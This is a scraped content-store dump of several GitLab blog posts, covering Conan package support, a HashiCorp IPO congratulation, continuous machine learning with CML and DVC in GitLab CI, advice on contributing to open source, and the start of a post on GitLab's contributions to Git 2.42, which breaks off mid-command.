This allows users to share private packages within an organization that is already using GitLab, publish public packages for general or open source use, and will open up many possibilities in utilizing GitLab’s CI pipelines to build and consume these packages automatically.\n\nCheck out a full demo:\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/2VVmrKNpC_0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n or a speedrun of Conan performed by the team in charge of the integration:\n\n \u003C!-- blank line -->\n \u003Cfigure class=\"video_container\">\n   \u003Ciframe src=\"https://www.youtube.com/embed/7NYgJWg-w5w\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n \u003C/figure>\n \u003C!-- blank line -->\n\nIf you need more help you can always refer to the [Conan docs](https://docs.conan.io/en/latest/).\n\n### The future of C and C++ in GitLab: Game development workflows!\n\nWhat’s coming next? In tradition with GitLab’s value of iteration, the initial release of Conan is a bare-bones API that allows you to publish and consume packages within GitLab. Next up will be a UI that displays much of the commonly referenced metadata for a given package, pre-written CI templates for automatic package publishing and consuming, less strict package naming conventions with remotes scoped to the group and project level within GitLab, and the list goes on.\n\n* [Conan Repository User Interface](https://gitlab.com/gitlab-org/gitlab/issues/33892)\n* [Project and Group level support for Conan Repository](https://gitlab.com/gitlab-org/gitlab/issues/11679)\n\nIf you are interested in package management at large, find a list of publicly available issues about the topic [here](https://gitlab.com/gitlab-org/gitlab/issues?label_name=Package+Repositories). 
Also, please note that if game development is your interest, large file support, partial clone and many other features that make game development possible with Git, will soon be available in GitLab. All the heavy lifting required for those massive binaries, engines, and animations will feel like feathers when we release those features. Stay tuned to know more about it in our newsletter.\n\n",[1099,231,9,686],{"slug":1397,"featured":6,"template":689},"conan-c-cpp-package-management-integration","content:en-us:blog:conan-c-cpp-package-management-integration.yml","Conan C Cpp Package Management Integration","en-us/blog/conan-c-cpp-package-management-integration.yml","en-us/blog/conan-c-cpp-package-management-integration",{"_path":1403,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1404,"content":1410,"config":1415,"_id":1417,"_type":14,"title":1418,"_source":16,"_file":1419,"_stem":1420,"_extension":19},"/en-us/blog/congratulations-to-hashicorp",{"title":1405,"description":1406,"ogTitle":1405,"ogDescription":1406,"noIndex":6,"ogImage":1407,"ogUrl":1408,"ogSiteName":673,"ogType":674,"canonicalUrls":1408,"schema":1409},"Congratulations to HashiCorp! Enjoy the cake!","We’re thrilled to see our open source and tech partner HashiCorp join us in the public market. Public companies like HashiCorp, MongoDB, Confluent, and GitLab show that with the right business models, open source can be highly profitable. Here’s a look at HashiCorp’s history, our partnership, and a nod to the future.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663383/Blog/Hero%20Images/tanuki-bg-full.png","https://about.gitlab.com/blog/congratulations-to-hashicorp","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Congratulations to HashiCorp! 
Enjoy the cake!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-12-09\",\n      }",{"title":1405,"description":1406,"authors":1411,"heroImage":1407,"date":1412,"body":1413,"category":682,"tags":1414},[970],"2021-12-09","![Cake with message reading \"Congrats on your IPO!\"](https://about.gitlab.com/images/blogimages/hashicorp-cake.jpg)\n\nFrom one open source DevOps company to another, we want to congratulate HashiCorp on becoming a public company! In celebration of your debut in the public markets we sent you a cake!\n\nGitLab and HashiCorp have been partners since 2019. And not only do we work well together, we have a lot in common: both companies have strong business models that are open-core providing both open-source and proprietary features for DevOps practitioners enabling them to create safer software faster. We may solve very different problems in the DevOps ecosystem, but that’s what makes us great partners.\n\n## HashiCorp: always ahead of the curve\n\nAlthough co-founder Mitchell Hashimoto didn’t officially incorporate HashiCorp (named after him) until 2012, he was making contributions to the open source community [from the time he was a teen](https://thenewstack.io/new-stack-makers-mitchell-hashimoto-vagrant-containers-growing-open-source/). And it’s clear Mitchell and team approached the business with a fresh perspective: HashiCorp’s Vagrant was the first automated provisioning of developer environments, which was very useful for onboarding and demos. When Docker became more popular, Vagrant added a Docker provider, making it more usable, even with Docker and Docker Compose later around.\n\nThe team made another bold move in 2014, rolling out the HashiCorp configuration language (HCL) as an alternative to YAML. 
The step got developers talking and taking sides, but also thinking about what might work best.\n\nAll of those efforts led to perhaps the most ground-breaking part of HashiCorp’s strategy: Vault. The company’s solution that safely stores and controls access to tokens, secrets, API keys, and more, is not just successful, it’s revolutionary. HashiCorp has turned the idea of secrets keeping on its head, by not just allowing companies to store secrets away, but to also have to renew them regularly, kind of like changing the locks on your door on a regular schedule, rather than giving out lots of keys. Clearly this is a paradigm shift for security.\n\n## HashiCorp and GitLab together\n\nVault’s a breakthrough technology for HashiCorp (don’t forget you can use GitLab with Vault to set up [GitLab OpenID connect for authentication](https://docs.gitlab.com/ee/integration/vault.html) or access your [secrets securely in CI](https://docs.gitlab.com/ee/ci/secrets/) as variables) but it’s just one of many that we integrate with.\n\n### Terraform and the GitLab DevOps Platform\n\n[Terraform](https://www.terraform.io) plays a critical role in GitLab’s GitOps/Infrastructure as Code (IaC) workflows, lowering the barriers to entry for teams to adopt Terraform while enabling them to use more stages on the DevOps platform. GitLab’s Terraform integration allows teams to manage the Terraform state in GitLab without external configuration backends.\n\nWe have created the [GitLab Terraform Provider](https://docs.gitlab.com/ee/user/infrastructure/iac/#the-gitlab-terraform-provider) to manage resources on your GitLab instance like groups, projects, users, and more to improve productivity by eliminating an engineer’s dependence on provisioning requests.\n\nA merge request is the center of all collaboration on the DevOps platform. 
It is important to verify how changes will affect your infrastructure, taking advantage of the [Terraform integration with merge requests](https://docs.gitlab.com/ee/user/infrastructure/iac/mr_integration.html). You can see the planned changes to your infrastructure without leaving the scope of a merge request review at the same time.\n\nUsing GitLab as a [Terraform Module Registry](https://docs.gitlab.com/ee/user/packages/terraform_module_registry/) allows you to publish and reference private Terraform modules in your project’s infrastructure registry, ensuring it’s possible to reuse modules across projects securely. Along with our [IaC security scanning](https://about.gitlab.com/releases/2021/11/22/gitlab-14-5-released/#introducing-infrastructure-as-code-iac-security-scanning) as part of the verify stage, you can safely maintain your infrastructure with ease.\n\n### Terraform and GitLab.com\n\nTerraform is used to manage all the environments of [GitLab.com’s infrastructure](https://gitlab.com/gitlab-com/gitlab-com-infrastructure/) in a single project, allowing collaboration across the entire engineering organization. It is also playing a critical role in our ongoing [migration to Kubernetes](https://about.gitlab.com/handbook/engineering/infrastructure/production/kubernetes/gitlab-com/). Want to deploy a stateful application quickly? GitLab’s [five-minute production app](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template) template leverages the power of Terraform to get you from idea to production in minutes.\n\n## We’re all-remote\n\nHashiCorp is a remote-first, distributed organization and publicly shares [proven principles](https://works.hashicorp.com) for everyone to learn. 
GitLab shares this passion for expanding access to opportunity, bolstering global communities, and building more inclusive workplaces where everyone can contribute.\n\n## We see the promise of the future\n\nThe successes of companies like GitLab and HashiCorp, as well as MongoDB and Confluent, on the open market show providing a free tier and commercial offering can be a highly profitable business model for open source technologies and we believe the DevOps market potential is just starting to be tapped.\n\nIn the [words of Dave Bullock](https://about.gitlab.com/blog/wag-labs-blog-post/), former Director of engineering at Wag!: “_We use GitLab with Terraform to test, review, save, and deploy all of our infrastructure as well as the application…The original idea was to just use GitLab as our CI platform. But as we built that out, we started using it for more and more tasks, and ended up using it for our full CI/CD pipeline._”  This is an example of the power of the DevOps Platform. GitLab’s partnership with HashiCorp has made it easier for customers to use more stages of the DevOps Platform. 
\n\nWe’re joining the global chorus in wishing HashiCorp the best of luck with its public offering.",[685,9,231],{"slug":1416,"featured":6,"template":689},"congratulations-to-hashicorp","content:en-us:blog:congratulations-to-hashicorp.yml","Congratulations To Hashicorp","en-us/blog/congratulations-to-hashicorp.yml","en-us/blog/congratulations-to-hashicorp",{"_path":1422,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1423,"content":1429,"config":1436,"_id":1438,"_type":14,"title":1439,"_source":16,"_file":1440,"_stem":1441,"_extension":19},"/en-us/blog/continuous-machine-learning-development-with-gitlab-ci",{"title":1424,"description":1425,"ogTitle":1424,"ogDescription":1425,"noIndex":6,"ogImage":1426,"ogUrl":1427,"ogSiteName":673,"ogType":674,"canonicalUrls":1427,"schema":1428},"How machine learning ops works with GitLab and continuous machine learning","We share different machine learning use cases for CML projects using GitLab CI.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681802/Blog/Hero%20Images/gitlab_cml_dvc_banner.png","https://about.gitlab.com/blog/continuous-machine-learning-development-with-gitlab-ci","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How machine learning ops works with GitLab and continuous machine learning\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dr. Elle O'Brien\"}],\n        \"datePublished\": \"2020-12-01\",\n      }",{"title":1424,"description":1425,"authors":1430,"heroImage":1426,"date":1432,"body":1433,"category":930,"tags":1434},[1431],"Dr. Elle O'Brien","2020-12-01","\n\nContinuous integration (CI) is standard practice in software development for speeding up development cycles, and for keeping them short and painless. 
CI means making small commits, often, and automating tests so every commit is a release candidate.\n\nWhen a project involves machine learning (ML), though, new challenges arise: Traditional [version control systems](/topics/version-control/) (like Git) that are key to CI struggle to manage large datasets and models.\nFurthermore, typical pass-fail tests are too coarse for understanding ML model performance – you might need to consider how several metrics, like accuracy, sensitivity, and specificity, are affected by changes in your code or data.\nData visualizations like confusion matrices and loss plots are needed to make sense of the high-dimensional and often unintuitive behavior of models.\n\n## Continuous machine learning: an introduction\n\n[Iterative.ai](https://iterative.ai), the team behind the popular open source version control system for ML projects [DVC](https://dvc.org) (short for Data Version Control),\nhas recently released another open source project called [CML](https://cml.dev), which stands for continuous machine learning.\nCML is our approach to adapting powerful CI systems like GitLab CI to common data science and ML use cases, including:\n\n- Automatic model training\n- Automatic model and dataset testing\n- Transparent and rich reporting about models and datasets (with data viz and metrics) in a merge request (MR)\n\n## Your first continuous machine learning report\n\nCML helps you put tables, data viz, and even sample outputs from models into comments on your MRs, so you can review datasets and models like code.\nLet's see how to produce a basic report – we'll train an ML model using GitLab CI, and then report a model metric and confusion matrix in our MR.\n\n![Confusion Matrix](https://about.gitlab.com/images/blogimages/cml_confusion_matrix.jpg){: .shadow.medium.center}\nConfusion matrix\n{: .note.text-center}\n\nTo make this report, our `.gitlab-ci.yml` contains the following workflow:\n\n```\n# .gitlab-ci.yml\nstages:\n    - 
cml_run\n\ncml:\n    stage: cml_run\n    image: dvcorg/cml-py3:latest\n\n    script:\n        - pip3 install -r requirements.txt\n        - python train.py\n\n        - cat metrics.txt >> report.md\n        - echo >> report.md\n        - cml-publish confusion_matrix.png --md --title 'confusion-matrix' >> report.md\n        - cml-send-comment report.md\n\n```\n\nThe entire [project repository is available here](https://gitlab.com/iterative.ai/cml-base-case/).\nThe steps consist of the following:\n\n- **Train**: This is a classic training step where we install requirements (like `pip` packages) and run the training script.\n- **Write a CML report**: Produced metrics are appended to a markdown report.\n- **Publish a CML report**: CML publishes an image of the confusion matrix with the embedded metrics to your GitLab MR.\n\nNow, when you and your teammates are deciding if your changes have had a positive effect on your modeling goals,\nyou have a dashboard of sorts to review. Plus, this report is linked by Git to your exact project version (data and code) and the runner used for training and the logs from that run.\n\nThis is the simplest use case for achieving continuous machine learning with CML and GitLab. 
In the next section we'll look at a more complex use case.\n\n## CML with DVC for data version control\n\nIn machine learning projects, you need to track changes in your datasets as well as changes in your code.\nSince Git is frequently a poor fit for managing large files, we can use [DVC](https://dvc.org) to link remote datasets to your CI system.\n\n```\n# .gitlab-ci.yml\nstages:\n  - cml_run\n\ncml:\n  stage: cml_run\n  image: dvcorg/cml-py3:latest\n  script:\n    - dvc pull data\n\n    - pip install -r requirements.txt\n    - dvc repro\n\n    # Compare metrics to master\n    - git fetch --prune\n    - dvc metrics diff --show-md master >> report.md\n    - echo >> report.md\n\n    # Visualize loss function diff\n    - dvc plots diff\n      --target loss.csv --show-vega master > vega.json\n    - vl2png vega.json | cml-publish --md >> report.md\n    - cml-send-comment report.md\n```\n\nThe entire [project is available here](https://gitlab.com/iterative.ai/cml-dvc-case).\nIn this workflow, we have additional steps that use DVC to pull a training dataset, run an experiment, and then use CML to publish the report in your MR.\n\n![CML with DVC](https://about.gitlab.com/images/blogimages/cml_dvc.jpg){: .shadow.medium.center}\nCML with DVC\n{: .note.text-center}\n\nFor more details about ML data versioning and tracking, check out the [DVC documentation](https://dvc.org/doc).\n\n## Summary\n\nWe made CML to adapt CI to machine learning, so data science teams can enjoy benefits such as:\n\n- Your code, data, models, and training infrastructure (hardware and software environment) will be Git versioned.\n- You’re automating work, testing frequently, and getting fast feedback (with visual reports if you use CML). In the long run, this will almost certainly speed up your project’s development.\n- CI systems make your work visible to everyone on your team. No one has to search very hard to find the code, data, and model from your best run.\n\n### About the guest author\n\n_Dr. 
Elle O'Brien is a Ph.D data scientist at iterative.ai and co-creator of [CML](https://cml.dev) project. She is also a lecturer at [UMSI](https://www.si.umich.edu/)._\n",[109,267,231,9,1435],"AI/ML",{"slug":1437,"featured":6,"template":689},"continuous-machine-learning-development-with-gitlab-ci","content:en-us:blog:continuous-machine-learning-development-with-gitlab-ci.yml","Continuous Machine Learning Development With Gitlab Ci","en-us/blog/continuous-machine-learning-development-with-gitlab-ci.yml","en-us/blog/continuous-machine-learning-development-with-gitlab-ci",{"_path":1443,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1444,"content":1450,"config":1456,"_id":1458,"_type":14,"title":1459,"_source":16,"_file":1460,"_stem":1461,"_extension":19},"/en-us/blog/contribute-to-open-source-land-jobs",{"title":1445,"description":1446,"ogTitle":1445,"ogDescription":1446,"noIndex":6,"ogImage":1447,"ogUrl":1448,"ogSiteName":673,"ogType":674,"canonicalUrls":1448,"schema":1449},"How contributing to open source can help you land your first job","Six compelling reasons why, warm fuzzy feelings aside, contributing to open source is good for your career.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679362/Blog/Hero%20Images/contribute-open-source-jobs.jpg","https://about.gitlab.com/blog/contribute-to-open-source-land-jobs","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How contributing to open source can help you land your first job\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ariel Camus\"}],\n        \"datePublished\": \"2018-04-06\",\n      }",{"title":1445,"description":1446,"authors":1451,"heroImage":1447,"date":1453,"body":1454,"category":10,"tags":1455},[1452],"Ariel Camus","2018-04-06","\n\nContributing to open source can significantly boost your chances of getting a job. 
And even\nthough this is true for all developers, regardless of their level of experience, it's especially\nimportant for entry-level ones.\n\nLet me make this perfectly clear: **contributing to open source is the most effective job-seeking\n hack you can take advantage of right now**.\n\nEven better, by contributing to open source you won't only improve your chances\nof getting a job, but you will also give back to the community, meet amazing and talented\npeople, and feel incredibly accomplished when your first contribution gets accepted.\n\nAt [Microverse](https://www.microverse.org/), the company I founded, we train remote software developers from all around\n the world, and we ask them to contribute to open source, starting from their first day in the program.\n\n**Here are six reasons why contributing to open source will help you too.**\n\n## Reason 1: Work as part of a (distributed) team\n\nWhen looking for a job, experience counts. However, experience limited to coding and the\nlanguage syntax is not enough. You need to know how to work as part of a team,\ncollaborating with others to build large and complex applications.\n\n**How do you get that kind of collaborative and at-scale experience if you can't get a job first?**\nThe answer is open source.\n\nLarge, open source projects are almost always built by a large team. Sometimes the people in\nthose teams even work for large organizations (e.g. GitLab, React/Facebook, etc.). 
By\nbecoming a contributor you get the chance to **work with those exceptional teams without\nhaving to be hired by those companies**.\n\nYou will sharpen your written communication skills, understand how to pick and negotiate\nthings to work on, perfect your Git Flow/[GitLab Flow](https://docs.gitlab.com/ee/topics/gitlab_flow.html), and many other things that are as\nvaluable as understanding the language syntax.\n\n## Reason 2: Work in a complex and large application\n\nIf you join a company, you will most likely work on an existing application. And, probably, it\nwill be a large and complex one. As a coding student you rarely have the chance to do that,\nbut when you join an open source project, that's exactly the scenario that you will face.\n\nYou will first need to **set up your local development environment** following the contributing\nguidelines provided by the project. You will then start by **refactoring existing code** to correct\ntypos and fix small bugs, the same way you would at a regular job! Finally, you will start\nunderstanding how all the **pieces** of a large application fit together, how it was **architected**,\nand where the code for each **functionality** lives.\n\nThese are not things you could experience working on small learning projects, but you need\nthis kind of experience if you want to land a job.\n\n## Reason 3: Get a lot of good feedback\n\nEvery time you pick an open source issue to work on, you will start by forking the project\nand creating a feature branch. You will write tests and code until you are happy with your\nsolution, and then submit a merge request to the original code.\n\nHowever, this is just the first step in the process. One of the main developers at the project\nwill review your merge request and will tell you if it's ready to be merged. 
Most likely it won't.\n But that's fine, because **she will also provide feedback about what you need to fix before\n your code can be merged**.\n\nCan you imagine getting this kind of direct feedback from a seasoned developer at GitLab or\nFacebook? Think about it… they really want your help, but they also need to keep the quality\nof the code at a high level. They will help you, and you will end up learning a lot in the process.\n\n## Reason 4: Build an online reputation\n\nGetting experience working as part of a team and contributing to large and complex applications\nis really important, but it won't help you land a job unless companies can find you and want to interview you.\n\nContributing to open source will help you with that too. After quickly reading your resume,\nemployers will want to find you online, and they will want to see your code. **GitLab and\nGitHub profiles are the new resumes**.\n\nIf employers can see that you are an active member of large open source projects, that will\ntell them something else that is very important: software is not just what you do for a living,\nbut it's also your passion and hence what you do in your free time.\n\nWhat do employers currently find when they search your name on Google? Open source will\nmake you look great!\n\n## Reason 5: Network with the community\n\nOpen source projects often have large organizations behind them who are constantly hiring\nnew developers. Wouldn't it be great for those organizations if they could hire people who\nlove their product? What if their new hires knew the product so well already that they could\nbe productive contributors from the moment they join the company?\n\nWell, that's exactly the value you offer as an active member of an open source community.\n**You know the product, you know the code, and the people behind the project know you.\nChances are that you will eventually be offered to work for them**. 
In fact, almost\na third of the first 40 engineers that GitLab hired were contributors to its codebase first.\n\n## Reason 6: Stay motivated\n\nLast, but not least, we all know the single and most important advice to be successful at anything\nis perseverance. However, staying motivated and focused while learning to code and applying\nfor jobs is not easy. There are a lot of things to learn, a lot of different paths to take, and many\nrejections on the path to landing your first job.\n\nJoining an open source project will give you the real-world encouragement and a community\n to support you throughout the journey.\n\nAre you convinced that contributing to open source is the best thing you can do right now to\nhelp you on your way to landing your first job? I'm pretty sure you are. Go ahead and [start now](/community/contribute/)!\n\n### About the guest author\n\n[Ariel Camus](https://twitter.com/arielcamus) is the founder of [Microverse](https://www.microverse.org/),\na company finding the world's untapped talent and training it to become remote software developers. 
Ariel was previously the co-founder and CEO\nof TouristEye, a travel startup that he grew to a million users and sold to Lonely Planet in 2013.\n\nCover photo by [Maik Jonietz](https://unsplash.com/@der_maik_?utm_source=medium&utm_medium=referral) on [Unsplash](https://unsplash.com?utm_source=medium&utm_medium=referral)\n{: .note}\n",[267,1078,9],{"slug":1457,"featured":6,"template":689},"contribute-to-open-source-land-jobs","content:en-us:blog:contribute-to-open-source-land-jobs.yml","Contribute To Open Source Land Jobs","en-us/blog/contribute-to-open-source-land-jobs.yml","en-us/blog/contribute-to-open-source-land-jobs",{"_path":1463,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1464,"content":1470,"config":1476,"_id":1478,"_type":14,"title":1479,"_source":16,"_file":1480,"_stem":1481,"_extension":19},"/en-us/blog/contributing-to-gitlab-with-ease",{"title":1465,"description":1466,"ogTitle":1465,"ogDescription":1466,"noIndex":6,"ogImage":1467,"ogUrl":1468,"ogSiteName":673,"ogType":674,"canonicalUrls":1468,"schema":1469},"Contributing to GitLab with ease","Everyone can contribute to GitLab, so here are a few tips to make your experience easy and pleasant.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678997/Blog/Hero%20Images/mergerequestsgame.jpg","https://about.gitlab.com/blog/contributing-to-gitlab-with-ease","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributing to GitLab with ease\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lin Jen-Shin\"}],\n        \"datePublished\": \"2018-08-23\",\n      }",{"title":1465,"description":1466,"authors":1471,"heroImage":1467,"date":1473,"body":1474,"category":10,"tags":1475},[1472],"Lin Jen-Shin","2018-08-23","\nAs a [Merge Request Coach](https://handbook.gitlab.com/job-families/expert/merge-request-coach/), I am happy to\nhelp community contributors feel comfortable when contributing\nto GitLab. 
During my time reviewing merge requests, I’ve learned a bit about\nhow it feels contributing to GitLab as a newcomer, and I’d like to share\nmy learnings with you.\n\n## Common issues in an MR (merge request)\n\nIn the past, I think styling might have been one of the most common issues.\nHowever, we’re improving our CI to run more static analysis, so these issues\nare now automatically pointed out. Today, contributors can easily see what\ndidn’t pass CI, and they can fix the issues very quickly, so this is not as\ncommon as it was in the past.\n\nThe biggest issue today might be that many contributors don’t add tests, since\ntests often require much more effort than fixing or adding something. If\nyou’re struggling with adding tests, please don’t worry. Merge request coaches\ncan tell you how to add tests when we see your contribution, and we’ll work\nthrough it together.\n\n## Best practices\n\n1. If you only remember one best practice, I hope it is to keep this\nreference handy when [contributing to GitLab](https://gitlab.com/gitlab-org/gitlab-ce/blob/master/doc/development/contributing/index.md).\nI know it’s super long, but it has all the information you need when it comes\nto making contributions to GitLab.\n\n2. Get [GDK](https://gitlab.com/gitlab-org/gitlab-development-kit) set up\nlocally if you haven’t already. Running tests locally is the best way to\ndevelop and debug, and I highly encourage that you incorporate this into your\nworkflow.\n\n3. Don’t ignore CI. If your pipeline didn’t pass, it’s important to go back and\nidentify the problem. Troubleshooting issues is a great way to practice your\nskills and help you learn from mistakes.\n\n4. Look at the [GitLab team page](/company/team/) and pick a merge request coach to\nping if you need help. Merge request coaches guide contributors and will even\njump in to help finish an MR if a contributor can no longer work on it,\nensuring that the attribution stays with the original contributor. 
Our goal is\nto help everyone feel comfortable and empowered to contribute even with\nthe smallest possible effort. Coaches have other responsibilities and don’t always\nproactively look for contributors who need help, so ping them if you’re stuck\nor ready for a review. If they’re not the right person to ping, they’ll pass\nyou over to the right one. We love helping community contributors, and we look\nforward to guiding and working with you.\n\n## Little-known features\n\nWe [recently welcomed](/blog/introducing-gitlab-s-integrated-development-environment/)\nWeb IDE to quickly edit multiple files on the web directly without cloning\nthe whole repository. Web IDE is useful if you just want to make some small\nchanges online. If you’d like to learn more about Web IDE, please\nhead over to our [documentation](https://docs.gitlab.com/ee/user/project/web_ide/).\n\nSince GitLab's development velocity is pretty high, sometimes conflicts can\nhappen very frequently. Did you know that you can resolve conflicts directly\nfrom the web UI? I really love this feature, because it’s very easy to resolve\nsimple conflicts, and I don’t need to launch my editor or Git to pull, merge,\nand push. With some simple clicks, I can save a lot of time for simple\nconflicts.\n\n## What everyone should know about MRs\n\nTo me, an MR is a tool to interactively develop and explore with other people.\nDon’t worry about being perfect in the first version of your MR. We learn\nthrough our mistakes and get better over time.\n\nIf you’ve made tons of contributions, we invite you to join our\n[core team](/community/core-team/) or apply for a [full-time position](/jobs/) at GitLab.\nThe MR is one of the most important ways we work together, and we’d love to\ncollaborate with you.\n\n## What to do if you’re struggling\n\nIf you’re having some trouble getting the hang of merge requests, I suggest\ntaking a look at how others work on the MRs. 
Following other people’s example\ncan help you understand what they did and why they did it. Reaching out to a\nmerge request coach, joining discussions, and reviewing others’ code are also\nways to help you get up to speed. I think that interacting with others is a\ngreat way to learn and improve.\n\n## We’d love your contributions!\n\nWe really enjoy collaborating with community contributors, and we look forward\nto working together. If you don't know what you can contribute, please take a\nlook at [`Accepting merge requests`](https://gitlab.com/gitlab-org/gitlab-ce/issues?label_name[]=Accepting+merge+requests).\nWe label some issues to explicitly call out the ones that we won’t schedule\nanytime soon, but we still want it. These issues usually have very clear scopes,\nso they often just require a simple implementation. They’re nice targets if\nyou don’t know what to contribute but want to gain experience.\n\nIf you would like to see how we handle community contributions, please take a\nlook at [`Community contribution`](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?label_name[]=Community%20contribution).\nWe put this label on all community contributions, therefore you can easily\nfind all the past and current community contributions. 
We look forward to\nyour future contributions as well!\n\n[Cover image](https://unsplash.com/photos/vqDAUejnwKw) by\n[Victor Freitas](https://unsplash.com/@victorfreitas), licensed\nunder [CC X](https://unsplash.com/license).\n{: .note}\n",[267,779,1037,803,9],{"slug":1477,"featured":6,"template":689},"contributing-to-gitlab-with-ease","content:en-us:blog:contributing-to-gitlab-with-ease.yml","Contributing To Gitlab With Ease","en-us/blog/contributing-to-gitlab-with-ease.yml","en-us/blog/contributing-to-gitlab-with-ease",{"_path":1483,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1484,"content":1490,"config":1497,"_id":1499,"_type":14,"title":1500,"_source":16,"_file":1501,"_stem":1502,"_extension":19},"/en-us/blog/contributions-to-git-2-42-release",{"title":1485,"description":1486,"ogTitle":1485,"ogDescription":1486,"noIndex":6,"ogImage":1487,"ogUrl":1488,"ogSiteName":673,"ogType":674,"canonicalUrls":1488,"schema":1489},"Git 2.42 release: Here are four of our contributions in detail","Find out how GitLab's Git team helped improve Git 2.42.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667792/Blog/Hero%20Images/git-241.jpg","https://about.gitlab.com/blog/contributions-to-git-2-42-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git 2.42 release: Here are four of our contributions in detail\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2023-10-12\",\n      }",{"title":1485,"description":1486,"authors":1491,"heroImage":1487,"date":1493,"body":1494,"category":1495,"tags":1496},[1492],"Christian Couder","2023-10-12","\n\n[Git 2.42](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.42.0.txt)\nwas officially released on August 21, 2023, and included some\nimprovements from GitLab's Git team. Git is the foundation of\nrepository data at GitLab. 
GitLab's Git team works on new features, performance improvements, documentation improvements,\nand growing the Git community. Often our contributions to Git have a\nlot to do with the way we integrate Git into our services at\nGitLab.\n\nWe previously shared [some of our improvements that were included in the Git 2.41 release](https://about.gitlab.com/blog/contributions-to-latest-git-release/). Here are some highlights from the Git 2.42 release, and a\nwindow into how we use Git on the server side at GitLab.\n\n## 1. Prevent certain refs from being packed\n\n### Write-ahead logging\nIn [Gitaly](https://docs.gitlab.com/ee/administration/gitaly/), we\nwant to use a [write-ahead log](https://gitlab.com/groups/gitlab-org/-/epics/8911)\nto replicate Git operations on different machines.\n\nThis means that the Git objects and references that should be changed\nby a Git operation are first kept in a log entry. Then, when all the\nmachines have agreed that the operation should proceed, the log entry\nis applied so the corresponding Git objects and references are\nactually added to the repositories on all the machines.\n\n### Need for temporary references\nBetween the time when a specific log entry is first written and when\nit is applied, other log entries could be applied which could remove\nsome objects and references. It could happen that these objects and\nreferences are needed to apply the specific log entry though.\n\nSo when we log an entry, we have to make sure that all the objects and\nreferences that it needs to be properly applied will not be removed\nuntil that entry is either actually applied or discarded.\n\nThe best way to make sure things are kept in Git is to create new Git\nreferences pointing to these things. So we decided to use temporary\nreferences for that purpose. 
They would be created when a log entry is\nwritten, and then deleted when that entry is either applied or\ndiscarded.\n\n### Packed-refs performance\nGit can store references in \"loose\" files, with one reference per\nfile, or in the `packed-refs` file, which contains many of them. The\n`git pack-refs` command is used to pack some references from \"loose\"\nfiles into the `packed-refs` file.\n\nFor reading a lot of references, the `packed-refs` file is very\nefficient, but for writing or deleting a single reference, it is not\nso efficient as rewriting the whole `packed-refs` file is required.\n\nAs temporary references are to be created and then deleted soon after,\nstoring them in the `packed-refs` file would not be efficient. It\nwould be better to store them in \"loose\" files.\n\nThe `git pack-refs` command had no way to be told precisely which refs\nshould be packed or not though. By default it would repack all the\ntags (which are refs in `refs/tags/`) and all the refs that are\nalready packed. With the `--all` option one could tell it to repack\nall the refs except the hidden refs, broken refs, and symbolic refs,\nbut that was the only thing that could be controlled.\n\n### Improving `git pack-refs`\nWe decided to improve `git pack-refs` by adding two new options to it:\n  - `--include \u003Cpattern>` which can be used to specify which refs should be packed\n  - `--exclude \u003Cpattern>` which can be used to specify which refs should not be packed\n\n[John Cai](https://gitlab.com/jcaigitlab), Gitaly:Git team engineering manager, implemented these options.\n\nFor example, if the refs managed by the write-ahead log are in\n`refs/wal/`, it's now possible to exclude them from being moved into\nthe `packed-refs` file by using:\n\n```\n$ git pack-refs --exclude \"refs/wal/*\"\n```\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/pull.1501.git.git.1683215331910.gitgitgadget@gmail.com/).\n\n## 2. 
Get machine-readable output from `git cat-file --batch`\n\n### Efficiently retrieving Git object information\nIn GitLab, we often retrieve Git object information. For example, when a\nuser navigates into the files and directories in a repository, we need\nto get the content of the corresponding Git blobs and trees so that\nwe can show it.\n\nIn Gitaly, we use `git cat-file` to retrieve Git object information\nfrom a Git repository. As it's a frequent operation, it needs to be\nperformed efficiently, so we use the batch modes of `git cat-file`\navailable through the `--batch`, `--batch-check` and `--batch-command`\noptions.\n\nIn these modes, a pointer to a Git object can be repeatedly sent to\nthe standard input, called 'stdin', of a `git cat-file` command, while\nthe corresponding object information is read from the standard output,\ncalled 'stdout' of the command. This way we don't need to launch a\nnew `git cat-file` command for each object.\n\nGitLab can keep, for example, a `git cat-file --batch-command` process\nrunning in the background while feeding it commands like\n`info \u003Cobject>` or `contents \u003Cobject>` through its stdin to\nget either information about an object or its content.\n\n### Newlines in stdin, stdout, and filenames\nThe commands or pointers to Git objects that are sent through stdin\nshould be delimited using newline characters, and in the same way `git\ncat-file` will use newline characters to delimit the information from\ndifferent Git objects in its output. This is a common shell practice\nto make it easy to chain commands together. For example, one can\neasily get the size (in bytes) of the last three commits on the current\nbranch using the following:\n\n```\n$ git log -3 --format='%H' | git cat-file 